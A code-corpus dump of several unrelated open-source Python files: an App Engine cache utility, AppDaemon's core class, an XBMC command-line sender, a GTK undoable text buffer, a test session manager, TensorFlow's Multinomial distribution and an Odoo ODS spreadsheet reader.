items that are old. This helps keep the size of your over all
datastore down.
"""
query = _AppEngineUtilities_Cache.all()
query.filter('timeout < ', datetime.datetime.now())
results = query.fetch(self.max_hits_to_clean)
db.delete(results)
#for result in results:
# result.delete()
def _validate_key(self, key):
if key == None:
raise KeyError
def _validate_value(self, value):
if value == None:
raise ValueError
def _validate_timeout(self, timeout):
if timeout == None:
timeout = datetime.datetime.now() +\
datetime.timedelta(seconds=DEFAULT_TIMEOUT)
if type(timeout) == type(1):
timeout = datetime.datetime.now() + \
datetime.timedelta(seconds = timeout)
if type(timeout) != datetime.datetime:
raise TypeError
if timeout < datetime.datetime.now():
raise ValueError
return timeout
def add(self, key = None, value = None, timeout = None):
"""
add adds an entry to the cache, if one does not already
exist.
"""
self._validate_key(key)
self._validate_value(value)
timeout = self._validate_timeout(timeout)
if key in self:
raise KeyError
cacheEntry = _AppEngineUtilities_Cache()
cacheEntry.cachekey = key
cacheEntry.value = pickle.dumps(value)
cacheEntry.timeout = timeout
# try to put the entry, if it fails silently pass
# failures may happen due to timeouts, the datastore being read
# only for maintenance or other applications. However, cache
# not being able to write to the datastore should not
# break the application
try:
cacheEntry.put()
except:
pass
memcache_timeout = timeout - datetime.datetime.now()
memcache.set('cache-'+key, value, int(memcache_timeout.seconds))
if 'AEU_Events' in __main__.__dict__:
__main__.AEU_Events.fire_event('cacheAdded')
def set(self, key = None, value = None, timeout = None):
"""
add adds an entry to the cache, overwriting an existing value
if one already exists.
"""
self._validate_key(key)
self._validate_value(value)
timeout = self._validate_timeout(timeout)
cacheEntry = self._read(key)
if not cacheEntry:
cacheEntry = _AppEngineUtilities_Cache()
cacheEntry.cachekey = key
cacheEntry.value = pickle.dumps(value)
cacheEntry.timeout = timeout
try:
cacheEntry.put()
except:
pass
memcache_timeout = timeout - datetime.datetime.now()
memcache.set('cache-'+key, value, int(memcache_timeout.seconds))
if 'AEU_Events' in __main__.__dict__:
__main__.AEU_Events.fire_event('cacheSet')
def _read(self, key = None):
"""
_read returns a cache object determined by the key. It's set
to private because it returns a db.Model object, and also
does not handle the unpickling of objects making it not the
best candidate for use. The special method __getitem__ is the
preferred access method for cache data.
"""
query = _AppEngineUtilities_Cache.all()
query.filter('cachekey', key)
query.filter('timeout > ', datetime.datetime.now())
results = query.fetch(1)
if len(results) is 0:
return None
return results[0]
if 'AEU_Events' in __main__.__dict__:
__main__.AEU_Events.fire_event('cacheReadFromDatastore')
if 'AEU_Events' in __main__.__dict__:
__main__.AEU_Events.fire_event('cacheRead')
def delete(self, key = None):
"""
Deletes a cache object determined by the key.
"""
memcache.delete('cache-'+key)
result = self._read(key)
if result:
if 'AEU_Events' in __main__.__dict__:
__main__.AEU_Events.fire_event('cacheDeleted')
result.delete()
def get(self, key):
"""
get is used to return the cache value associated with the key passed.
"""
mc = memcache.get('cache-'+key)
if mc:
if 'AEU_Events' in __main__.__dict__:
__main__.AEU_Events.fire_event('cacheReadFromMemcache')
if 'AEU_Events' in __main__.__dict__:
__main__.AEU_Events.fire_event('cacheRead')
return mc
result = self._read(key)
if result:
timeout = result.timeout - datetime.datetime.now()
# print timeout.seconds
memcache.set('cache-'+key, pickle.loads(result.value),
int(timeout.seconds))
return pickle.loads(result.value)
else:
raise KeyError
def get_many(self, keys):
"""
Returns a dict mapping each key in keys to its value. If the given
key is missing, it will be missing from the response dict.
"""
dict = {}
for key in keys:
value = self.get(key)
if value is not None:
dict[key] = val
return dict
def __getitem__(self, key):
"""
__getitem__ is necessary for this object to emulate a container.
"""
return self.get(key)
def __setitem__(self, key, value):
"""
__setitem__ is necessary for this object to emulate a container.
"""
return self.set(key, value)
def __delitem__(self, key):
"""
Implement the 'del' keyword
"""
return self.delete(key)
def __contains__(self, key):
"""
Implements "in" operator
"""
try:
r = self.__getitem__(key)
except KeyError:
return False
return True
def has_key(self, keyname):
"""
Equivalent to k in a, use that form in new code
"""
return self.__contains__(keyname)
| apache-2.0 |
acockburn/appdaemon | appdaemon/appdaemon.py | 2 | 8426 | import os
import os.path
import concurrent.futures
import threading
class AppDaemon:
def __init__(self, logging, loop, **kwargs):
#
# Import various AppDaemon bits and pieces now to avoid circular import
#
import appdaemon.utils as utils
import appdaemon.thread_async as appq
import appdaemon.utility_loop as utility
import appdaemon.plugin_management as plugins
import appdaemon.threading
import appdaemon.app_management as apps
import appdaemon.callbacks as callbacks
import appdaemon.futures as futures
import appdaemon.state as state
import appdaemon.events as events
import appdaemon.services as services
import appdaemon.sequences as sequences
import appdaemon.scheduler as scheduler
self.logging = logging
self.logging.register_ad(self)
self.logger = logging.get_logger()
self.threading = None
self.callbacks = None
self.futures = None
self.state = None
self.config = kwargs
self.booted = "booting"
self.config["ad_version"] = utils.__version__
self.check_app_updates_profile = ""
self.was_dst = False
self.last_state = None
self.executor = None
self.loop = None
self.srv = None
self.appd = None
self.stopping = False
self.http = None
self.admin_loop = None
self.global_vars = {}
self.global_lock = threading.RLock()
self.config_file_modified = 0
self.sched = None
self.thread_async = None
self.utility = None
self.module_debug = kwargs["module_debug"]
# User Supplied/Defaults
self.load_distribution = "roundrobbin"
utils.process_arg(self, "load_distribution", kwargs)
self.app_dir = None
utils.process_arg(self, "app_dir", kwargs)
self.starttime = None
utils.process_arg(self, "starttime", kwargs)
self.latitude = None
utils.process_arg(self, "latitude", kwargs, float=True)
self.longitude = None
utils.process_arg(self, "longitude", kwargs, float=True)
self.elevation = None
utils.process_arg(self, "elevation", kwargs, int=True)
self.time_zone = None
utils.process_arg(self, "time_zone", kwargs)
self.tz = None
self.loop = loop
self.logfile = None
self.errfile = None
self.config_file = None
utils.process_arg(self, "config_file", kwargs)
self.config_dir = None
utils.process_arg(self, "config_dir", kwargs)
self.timewarp = 1
utils.process_arg(self, "timewarp", kwargs, float=True)
self.max_clock_skew = 1
utils.process_arg(self, "max_clock_skew", kwargs, int=True)
self.thread_duration_warning_threshold = 10
utils.process_arg(self, "thread_duration_warning_threshold", kwargs, float=True)
self.threadpool_workers = 10
utils.process_arg(self, "threadpool_workers", kwargs, int=True)
self.endtime = None
utils.process_arg(self, "endtime", kwargs)
self.loglevel = "INFO"
utils.process_arg(self, "loglevel", kwargs)
self.api_port = None
utils.process_arg(self, "api_port", kwargs)
self.utility_delay = 1
utils.process_arg(self, "utility_delay", kwargs, int=True)
self.admin_delay = 1
utils.process_arg(self, "admin_delay", kwargs, int=True)
self.max_utility_skew = self.utility_delay * 2
utils.process_arg(self, "max_utility_skew", kwargs, float=True)
self.check_app_updates_profile = False
utils.process_arg(self, "check_app_updates_profile", kwargs)
self.production_mode = False
utils.process_arg(self, "production_mode", kwargs)
self.invalid_yaml_warnings = True
utils.process_arg(self, "invalid_yaml_warnings", kwargs)
self.missing_app_warnings = True
utils.process_arg(self, "missing_app_warnings", kwargs)
self.log_thread_actions = False
utils.process_arg(self, "log_thread_actions", kwargs)
self.qsize_warning_threshold = 50
utils.process_arg(self, "qsize_warning_threshold", kwargs, int=True)
self.qsize_warning_step = 60
utils.process_arg(self, "qsize_warning_step", kwargs, int=True)
self.qsize_warning_iterations = 10
utils.process_arg(self, "qsize_warning_iterations", kwargs, int=True)
self.internal_function_timeout = 10
utils.process_arg(self, "internal_function_timeout", kwargs, int=True)
self.namespaces = {}
utils.process_arg(self, "namespaces", kwargs)
self.exclude_dirs = ["__pycache__"]
if "exclude_dirs" in kwargs:
self.exclude_dirs += kwargs["exclude_dirs"]
self.stop_function = None
utils.process_arg(self, "stop_function", kwargs)
if not kwargs.get("cert_verify", True):
self.certpath = False
if kwargs.get("disable_apps") is True:
self.apps = False
self.logging.log("INFO", "Apps are disabled")
else:
self.apps = True
#
# Set up services
#
self.services = services.Services(self)
#
# Set up sequences
#
self.sequences = sequences.Sequences(self)
#
# Set up scheduler
#
self.sched = scheduler.Scheduler(self)
#
# Set up state
#
self.state = state.State(self)
#
# Set up events
#
self.events = events.Events(self)
#
# Set up callbacks
#
self.callbacks = callbacks.Callbacks(self)
#
# Set up futures
#
self.futures = futures.Futures(self)
if self.apps is True:
if self.app_dir is None:
if self.config_dir is None:
self.app_dir = utils.find_path("apps")
self.config_dir = os.path.dirname(self.app_dir)
else:
self.app_dir = os.path.join(self.config_dir, "apps")
utils.check_path("config_dir", self.logger, self.config_dir, permissions="rwx")
utils.check_path("appdir", self.logger, self.app_dir)
# Initialize Apps
self.app_management = apps.AppManagement(self, kwargs.get("app_config_file", None))
# threading setup
self.threading = appdaemon.threading.Threading(self, kwargs)
self.stopping = False
#
# Set up Executor ThreadPool
#
if "threadpool_workers" in kwargs:
self.threadpool_workers = int(kwargs["threadpool_workers"])
self.executor = concurrent.futures.ThreadPoolExecutor(max_workers=self.threadpool_workers)
# Initialize Plugins
if "plugins" in kwargs:
args = kwargs["plugins"]
else:
args = None
self.plugins = plugins.Plugins(self, args)
# Create thread_async Loop
self.logger.debug("Starting thread_async loop")
if self.apps is True:
self.thread_async = appq.ThreadAsync(self)
loop.create_task(self.thread_async.loop())
# Create utility loop
self.logger.debug("Starting utility loop")
self.utility = utility.Utility(self)
loop.create_task(self.utility.loop())
def stop(self):
self.stopping = True
if self.admin_loop is not None:
self.admin_loop.stop()
if self.thread_async is not None:
self.thread_async.stop()
if self.sched is not None:
self.sched.stop()
if self.utility is not None:
self.utility.stop()
if self.plugins is not None:
self.plugins.stop()
def terminate(self):
if self.state is not None:
self.state.terminate()
#
# Utilities
#
def register_http(self, http):
import appdaemon.admin_loop as admin_loop
self.http = http
# Create admin loop
if http.admin is not None:
self.logger.debug("Starting admin loop")
self.admin_loop = admin_loop.AdminLoop(self)
self.loop.create_task(self.admin_loop.loop())
| mit |
tkalpakidis/xbmc | tools/EventClients/Clients/XBMC Send/xbmc-send.py | 49 | 2518 | #!/usr/bin/python
#
# XBMC Media Center
# XBMC Send
# Copyright (c) 2009 team-xbmc
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
import sys
import getopt
from socket import *
try:
from xbmc.xbmcclient import *
except:
sys.path.append('../../lib/python')
from xbmcclient import *
def usage():
print "xbmc-send [OPTION] --action=ACTION"
print 'Example'
print '\txbmc-send --host=192.168.0.1 --port=9777 --action="XBMC.Quit"'
print "Options"
print "\t-?, --help\t\t\tWill bring up this message"
print "\t--host=HOST\t\t\tChoose what HOST to connect to (default=localhost)"
print "\t--port=PORT\t\t\tChoose what PORT to connect to (default=9777)"
print '\t--action=ACTION\t\t\tSends an action to XBMC, this option can be added multiple times to create a macro'
pass
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "?pa:v", ["help", "host=", "port=", "action="])
except getopt.GetoptError, err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
usage()
sys.exit(2)
ip = "localhost"
port = 9777
actions = []
verbose = False
for o, a in opts:
if o in ("-?", "--help"):
usage()
sys.exit()
elif o == "--host":
ip = a
elif o == "--port":
port = int(a)
elif o in ("-a", "--action"):
actions.append(a)
else:
assert False, "unhandled option"
addr = (ip, port)
sock = socket(AF_INET,SOCK_DGRAM)
if len(actions) is 0:
usage()
sys.exit(0)
for action in actions:
print 'Sending action:', action
packet = PacketACTION(actionmessage=action, actiontype=ACTION_BUTTON)
packet.send(sock, addr)
if __name__=="__main__":
main()
| gpl-2.0 |
aurule/HiToDo | undobuffer.py | 1 | 9086 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
""" gtk textbuffer with undo functionality """
# Copyright (C) 2009 Florian Heinle
# Some modifications by Peter Andrews, 2012 and 2013
#
# This library is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this library. If not, see <http://www.gnu.org/licenses/>.
from gi.repository import Gtk
class UndoableInsert(object):
"""something that has been inserted into our textbuffer"""
def __init__(self, text_iter, text, length):
self.offset = text_iter.get_offset()
self.text = text
self.length = length
if self.length > 1 or self.text in ("\r", "\n", " "):
self.mergeable = False
else:
self.mergeable = True
class UndoableDelete(object):
"""something that has ben deleted from our textbuffer"""
def __init__(self, text_buffer, start_iter, end_iter):
self.text = text_buffer.get_text(start_iter, end_iter, True)
self.start = start_iter.get_offset()
self.end = end_iter.get_offset()
# need to find out if backspace or delete key has been used
# so we don't mess up during redo
insert_iter = text_buffer.get_iter_at_mark(text_buffer.get_insert())
if insert_iter.get_offset() <= self.start:
self.delete_key_used = True
else:
self.delete_key_used = False
if self.end - self.start > 1 or self.text in ("\r", "\n", " "):
self.mergeable = False
else:
self.mergeable = True
class UndoableTextBuffer(Gtk.TextBuffer):
"""text buffer with added undo capabilities
designed as a drop-in replacement for gtksourceview,
at least as far as undo is concerned"""
def __init__(self):
"""
we'll need empty stacks for undo/redo and some state keeping
"""
Gtk.TextBuffer.__init__(self)
self.undo_stack = []
self.redo_stack = []
self.not_undoable_action = False
self.undo_in_progress = False
self.connect('insert-text', self.on_insert_text)
self.connect('delete-range', self.on_delete_range)
@property
def can_undo(self):
return bool(self.undo_stack)
@property
def can_redo(self):
return bool(self.redo_stack)
def clear_undo(self):
'''Void undo/redo buffers.'''
self.undo_stack[:] = []
self.redo_stack[:] = []
def on_insert_text(self, textbuffer, text_iter, text, length):
def can_be_merged(prev, cur):
"""see if we can merge multiple inserts here
will try to merge words or whitespace
can't merge if prev and cur are not mergeable in the first place
can't merge when user set the input bar somewhere else
can't merge across word boundaries"""
WHITESPACE = (' ', '\t')
if not cur.mergeable or not prev.mergeable:
return False
elif cur.offset != (prev.offset + prev.length):
return False
elif cur.text in WHITESPACE and not prev.text in WHITESPACE:
return False
elif prev.text in WHITESPACE and not cur.text in WHITESPACE:
return False
return True
if not self.undo_in_progress:
self.redo_stack = []
if self.not_undoable_action:
return
undo_action = UndoableInsert(text_iter, text, length)
try:
prev_insert = self.undo_stack.pop()
except IndexError:
self.undo_stack.append(undo_action)
return
if not isinstance(prev_insert, UndoableInsert):
self.undo_stack.append(prev_insert)
self.undo_stack.append(undo_action)
return
if can_be_merged(prev_insert, undo_action):
prev_insert.length += undo_action.length
prev_insert.text += undo_action.text
self.undo_stack.append(prev_insert)
else:
self.undo_stack.append(prev_insert)
self.undo_stack.append(undo_action)
def on_delete_range(self, text_buffer, start_iter, end_iter):
def can_be_merged(prev, cur):
"""see if we can merge multiple deletions here
will try to merge words or whitespace
can't merge if prev and cur are not mergeable in the first place
can't merge if delete and backspace key were both used
can't merge across word boundaries"""
WHITESPACE = (' ', '\t')
if not cur.mergeable or not prev.mergeable:
return False
elif prev.delete_key_used != cur.delete_key_used:
return False
elif prev.start != cur.start and prev.start != cur.end:
return False
elif cur.text not in WHITESPACE and \
prev.text in WHITESPACE:
return False
elif cur.text in WHITESPACE and \
prev.text not in WHITESPACE:
return False
return True
if not self.undo_in_progress:
self.redo_stack = []
if self.not_undoable_action:
return
undo_action = UndoableDelete(text_buffer, start_iter, end_iter)
try:
prev_delete = self.undo_stack.pop()
except IndexError:
self.undo_stack.append(undo_action)
return
if not isinstance(prev_delete, UndoableDelete):
self.undo_stack.append(prev_delete)
self.undo_stack.append(undo_action)
return
if can_be_merged(prev_delete, undo_action):
if prev_delete.start == undo_action.start: # delete key used
prev_delete.text += undo_action.text
prev_delete.end += (undo_action.end - undo_action.start)
else: # Backspace used
prev_delete.text = "%s%s" % (undo_action.text,
prev_delete.text)
prev_delete.start = undo_action.start
self.undo_stack.append(prev_delete)
else:
self.undo_stack.append(prev_delete)
self.undo_stack.append(undo_action)
def begin_not_undoable_action(self):
"""don't record the next actions
toggles self.not_undoable_action"""
self.not_undoable_action = True
def end_not_undoable_action(self):
"""record next actions
toggles self.not_undoable_action"""
self.not_undoable_action = False
def undo(self):
"""undo inserts or deletions
undone actions are being moved to redo stack"""
if not self.undo_stack:
return
self.begin_not_undoable_action()
self.undo_in_progress = True
undo_action = self.undo_stack.pop()
self.redo_stack.append(undo_action)
if isinstance(undo_action, UndoableInsert):
start = self.get_iter_at_offset(undo_action.offset)
stop = self.get_iter_at_offset(
undo_action.offset + undo_action.length
)
self.delete(start, stop)
self.place_cursor(start)
else:
start = self.get_iter_at_offset(undo_action.start)
self.insert(start, undo_action.text)
stop = self.get_iter_at_offset(undo_action.end)
if undo_action.delete_key_used:
self.place_cursor(start)
else:
self.place_cursor(stop)
self.end_not_undoable_action()
self.undo_in_progress = False
def redo(self):
"""redo inserts or deletions
redone actions are moved to undo stack"""
if not self.redo_stack:
return
self.begin_not_undoable_action()
self.undo_in_progress = True
redo_action = self.redo_stack.pop()
self.undo_stack.append(redo_action)
if isinstance(redo_action, UndoableInsert):
start = self.get_iter_at_offset(redo_action.offset)
self.insert(start, redo_action.text)
new_cursor_pos = self.get_iter_at_offset(
redo_action.offset + redo_action.length
)
self.place_cursor(new_cursor_pos)
else:
start = self.get_iter_at_offset(redo_action.start)
stop = self.get_iter_at_offset(redo_action.end)
self.delete(start, stop)
self.place_cursor(start)
self.end_not_undoable_action()
self.undo_in_progress = False
| gpl-3.0 |
LaunchKey/launchkey-python | features/steps/managers/directory_session.py | 2 | 1321 | from .base import BaseManager
class SessionListNotRetrieved(Exception):
"""Session list has not been retrieved yet"""
class DirectorySessionManager(BaseManager):
def __init__(self, organization_factory):
self.current_session_list = None
self.previous_session_list = None
super(DirectorySessionManager, self, ).__init__(
organization_factory)
@property
def current_session_list(self):
if self._current_session_list is None:
raise SessionListNotRetrieved
return self._current_session_list
@current_session_list.setter
def current_session_list(self, value):
self.previous_session_list = getattr(
self, "_current_session_list", None)
self._current_session_list = value
def retrieve_session_list_for_user(self, user_identifier, directory_id):
directory_client = self._get_directory_client(directory_id)
self.current_session_list = directory_client.get_all_service_sessions(
user_identifier
)
return self.current_session_list
def end_all_sessions_for_user(self, user_identifier, directory_id):
directory_client = self._get_directory_client(directory_id)
directory_client.end_all_service_sessions(
user_identifier
)
| mit |
snnn/tensorflow | tensorflow/python/ops/distributions/multinomial.py | 6 | 11806 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The Multinomial distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops.distributions import distribution
from tensorflow.python.ops.distributions import util as distribution_util
from tensorflow.python.util import deprecation
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"Multinomial",
]
_multinomial_sample_note = """For each batch of counts, `value = [n_0, ...
,n_{k-1}]`, `P[value]` is the probability that after sampling `self.total_count`
draws from this Multinomial distribution, the number of draws falling in class
`j` is `n_j`. Since this definition is [exchangeable](
https://en.wikipedia.org/wiki/Exchangeable_random_variables); different
sequences have the same counts so the probability includes a combinatorial
coefficient.
Note: `value` must be a non-negative tensor with dtype `self.dtype`, have no
fractional components, and such that
`tf.reduce_sum(value, -1) = self.total_count`. Its shape must be broadcastable
with `self.probs` and `self.total_count`."""
@tf_export("distributions.Multinomial")
class Multinomial(distribution.Distribution):
"""Multinomial distribution.
This Multinomial distribution is parameterized by `probs`, a (batch of)
length-`K` `prob` (probability) vectors (`K > 1`) such that
`tf.reduce_sum(probs, -1) = 1`, and a `total_count` number of trials, i.e.,
the number of trials per draw from the Multinomial. It is defined over a
(batch of) length-`K` vector `counts` such that
`tf.reduce_sum(counts, -1) = total_count`. The Multinomial is identically the
Binomial distribution when `K = 2`.
#### Mathematical Details
The Multinomial is a distribution over `K`-class counts, i.e., a length-`K`
vector of non-negative integer `counts = n = [n_0, ..., n_{K-1}]`.
The probability mass function (pmf) is,
```none
pmf(n; pi, N) = prod_j (pi_j)**n_j / Z
Z = (prod_j n_j!) / N!
```
where:
* `probs = pi = [pi_0, ..., pi_{K-1}]`, `pi_j > 0`, `sum_j pi_j = 1`,
* `total_count = N`, `N` a positive integer,
* `Z` is the normalization constant, and,
* `N!` denotes `N` factorial.
Distribution parameters are automatically broadcast in all functions; see
examples for details.
#### Pitfalls
The number of classes, `K`, must not exceed:
- the largest integer representable by `self.dtype`, i.e.,
`2**(mantissa_bits+1)` (IEE754),
- the maximum `Tensor` index, i.e., `2**31-1`.
In other words,
```python
K <= min(2**31-1, {
tf.float16: 2**11,
tf.float32: 2**24,
tf.float64: 2**53 }[param.dtype])
```
Note: This condition is validated only when `self.validate_args = True`.
#### Examples
Create a 3-class distribution, with the 3rd class is most likely to be drawn,
using logits.
```python
logits = [-50., -43, 0]
dist = Multinomial(total_count=4., logits=logits)
```
Create a 3-class distribution, with the 3rd class is most likely to be drawn.
```python
p = [.2, .3, .5]
dist = Multinomial(total_count=4., probs=p)
```
The distribution functions can be evaluated on counts.
```python
# counts same shape as p.
counts = [1., 0, 3]
dist.prob(counts) # Shape []
# p will be broadcast to [[.2, .3, .5], [.2, .3, .5]] to match counts.
counts = [[1., 2, 1], [2, 2, 0]]
dist.prob(counts) # Shape [2]
# p will be broadcast to shape [5, 7, 3] to match counts.
counts = [[...]] # Shape [5, 7, 3]
dist.prob(counts) # Shape [5, 7]
```
Create a 2-batch of 3-class distributions.
```python
p = [[.1, .2, .7], [.3, .3, .4]] # Shape [2, 3]
dist = Multinomial(total_count=[4., 5], probs=p)
counts = [[2., 1, 1], [3, 1, 1]]
dist.prob(counts) # Shape [2]
dist.sample(5) # Shape [5, 2, 3]
```
"""
@deprecation.deprecated(
"2019-01-01",
"The TensorFlow Distributions library has moved to "
"TensorFlow Probability "
"(https://github.com/tensorflow/probability). You "
"should update all references to use `tfp.distributions` "
"instead of `tf.distributions`.",
warn_once=True)
def __init__(self,
total_count,
logits=None,
probs=None,
validate_args=False,
allow_nan_stats=True,
name="Multinomial"):
"""Initialize a batch of Multinomial distributions.
Args:
total_count: Non-negative floating point tensor with shape broadcastable
to `[N1,..., Nm]` with `m >= 0`. Defines this as a batch of
`N1 x ... x Nm` different Multinomial distributions. Its components
should be equal to integer values.
logits: Floating point tensor representing unnormalized log-probabilities
of a positive event with shape broadcastable to
`[N1,..., Nm, K]` `m >= 0`, and the same dtype as `total_count`. Defines
this as a batch of `N1 x ... x Nm` different `K` class Multinomial
distributions. Only one of `logits` or `probs` should be passed in.
probs: Positive floating point tensor with shape broadcastable to
`[N1,..., Nm, K]` `m >= 0` and same dtype as `total_count`. Defines
this as a batch of `N1 x ... x Nm` different `K` class Multinomial
distributions. `probs`'s components in the last portion of its shape
should sum to `1`. Only one of `logits` or `probs` should be passed in.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`, statistics
(e.g., mean, mode, variance) use the value "`NaN`" to indicate the
result is undefined. When `False`, an exception is raised if one or
more of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
"""
parameters = dict(locals())
with ops.name_scope(name, values=[total_count, logits, probs]) as name:
self._total_count = ops.convert_to_tensor(total_count, name="total_count")
if validate_args:
self._total_count = (
distribution_util.embed_check_nonnegative_integer_form(
self._total_count))
self._logits, self._probs = distribution_util.get_logits_and_probs(
logits=logits,
probs=probs,
multidimensional=True,
validate_args=validate_args,
name=name)
self._mean_val = self._total_count[..., array_ops.newaxis] * self._probs
super(Multinomial, self).__init__(
dtype=self._probs.dtype,
reparameterization_type=distribution.NOT_REPARAMETERIZED,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
parameters=parameters,
graph_parents=[self._total_count,
self._logits,
self._probs],
name=name)
@property
def total_count(self):
"""Number of trials used to construct a sample."""
return self._total_count
@property
def logits(self):
"""Vector of coordinatewise logits."""
return self._logits
@property
def probs(self):
"""Probability of drawing a `1` in that coordinate."""
return self._probs
def _batch_shape_tensor(self):
return array_ops.shape(self._mean_val)[:-1]
def _batch_shape(self):
return self._mean_val.get_shape().with_rank_at_least(1)[:-1]
def _event_shape_tensor(self):
return array_ops.shape(self._mean_val)[-1:]
def _event_shape(self):
return self._mean_val.get_shape().with_rank_at_least(1)[-1:]
def _sample_n(self, n, seed=None):
n_draws = math_ops.cast(self.total_count, dtype=dtypes.int32)
k = self.event_shape_tensor()[0]
# broadcast the total_count and logits to same shape
n_draws = array_ops.ones_like(
self.logits[..., 0], dtype=n_draws.dtype) * n_draws
logits = array_ops.ones_like(
n_draws[..., array_ops.newaxis], dtype=self.logits.dtype) * self.logits
# flatten the total_count and logits
flat_logits = array_ops.reshape(logits, [-1, k]) # [B1B2...Bm, k]
flat_ndraws = n * array_ops.reshape(n_draws, [-1]) # [B1B2...Bm]
# computes each total_count and logits situation by map_fn
def _sample_single(args):
logits, n_draw = args[0], args[1] # [K], []
x = random_ops.multinomial(logits[array_ops.newaxis, ...], n_draw,
seed) # [1, n*n_draw]
x = array_ops.reshape(x, shape=[n, -1]) # [n, n_draw]
x = math_ops.reduce_sum(array_ops.one_hot(x, depth=k), axis=-2) # [n, k]
return x
x = functional_ops.map_fn(
_sample_single, [flat_logits, flat_ndraws],
dtype=self.dtype) # [B1B2...Bm, n, k]
# reshape the results to proper shape
x = array_ops.transpose(x, perm=[1, 0, 2])
final_shape = array_ops.concat([[n], self.batch_shape_tensor(), [k]], 0)
x = array_ops.reshape(x, final_shape) # [n, B1, B2,..., Bm, k]
return x
@distribution_util.AppendDocstring(_multinomial_sample_note)
def _log_prob(self, counts):
return self._log_unnormalized_prob(counts) - self._log_normalization(counts)
def _log_unnormalized_prob(self, counts):
counts = self._maybe_assert_valid_sample(counts)
return math_ops.reduce_sum(counts * nn_ops.log_softmax(self.logits), -1)
def _log_normalization(self, counts):
counts = self._maybe_assert_valid_sample(counts)
return -distribution_util.log_combinations(self.total_count, counts)
def _mean(self):
return array_ops.identity(self._mean_val)
def _covariance(self):
p = self.probs * array_ops.ones_like(
self.total_count)[..., array_ops.newaxis]
return array_ops.matrix_set_diag(
-math_ops.matmul(self._mean_val[..., array_ops.newaxis],
p[..., array_ops.newaxis, :]), # outer product
self._variance())
def _variance(self):
p = self.probs * array_ops.ones_like(
self.total_count)[..., array_ops.newaxis]
return self._mean_val - self._mean_val * p
def _maybe_assert_valid_sample(self, counts):
"""Check counts for proper shape, values, then return tensor version."""
if not self.validate_args:
return counts
counts = distribution_util.embed_check_nonnegative_integer_form(counts)
return control_flow_ops.with_dependencies([
check_ops.assert_equal(
self.total_count, math_ops.reduce_sum(counts, -1),
message="counts must sum to `self.total_count`"),
], counts)
| apache-2.0 |
dfang/odoo | addons/base_import/models/odf_ods_reader.py | 69 | 3584 | # Copyright 2011 Marco Conti
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# sourced from https://github.com/marcoconti83/read-ods-with-odfpy
# further altered locally
from odf import opendocument
from odf.table import Table, TableRow, TableCell
from odf.text import P
class ODSReader(object):
# loads the file
def __init__(self, file=None, content=None, clonespannedcolumns=None):
if not content:
self.clonespannedcolumns = clonespannedcolumns
self.doc = opendocument.load(file)
else:
self.clonespannedcolumns = clonespannedcolumns
self.doc = content
self.SHEETS = {}
for sheet in self.doc.spreadsheet.getElementsByType(Table):
self.readSheet(sheet)
# reads a sheet in the sheet dictionary, storing each sheet as an
# array (rows) of arrays (columns)
def readSheet(self, sheet):
name = sheet.getAttribute("name")
rows = sheet.getElementsByType(TableRow)
arrRows = []
# for each row
for row in rows:
arrCells = []
cells = row.getElementsByType(TableCell)
# for each cell
for count, cell in enumerate(cells, start=1):
# repeated value?
repeat = 0
if count != len(cells):
repeat = cell.getAttribute("numbercolumnsrepeated")
if not repeat:
repeat = 1
spanned = int(cell.getAttribute('numbercolumnsspanned') or 0)
# clone spanned cells
if self.clonespannedcolumns is not None and spanned > 1:
repeat = spanned
ps = cell.getElementsByType(P)
textContent = u""
# for each text/text:span node
for p in ps:
for n in p.childNodes:
if n.nodeType == 1 and n.tagName == "text:span":
for c in n.childNodes:
if c.nodeType == 3:
textContent = u'{}{}'.format(textContent, n.data)
if n.nodeType == 3:
textContent = u'{}{}'.format(textContent, n.data)
if textContent:
if not textContent.startswith("#"): # ignore comments cells
for rr in range(int(repeat)): # repeated?
arrCells.append(textContent)
else:
for rr in range(int(repeat)):
arrCells.append("")
# if row contained something
if arrCells:
arrRows.append(arrCells)
#else:
# print ("Empty or commented row (", row_comment, ")")
self.SHEETS[name] = arrRows
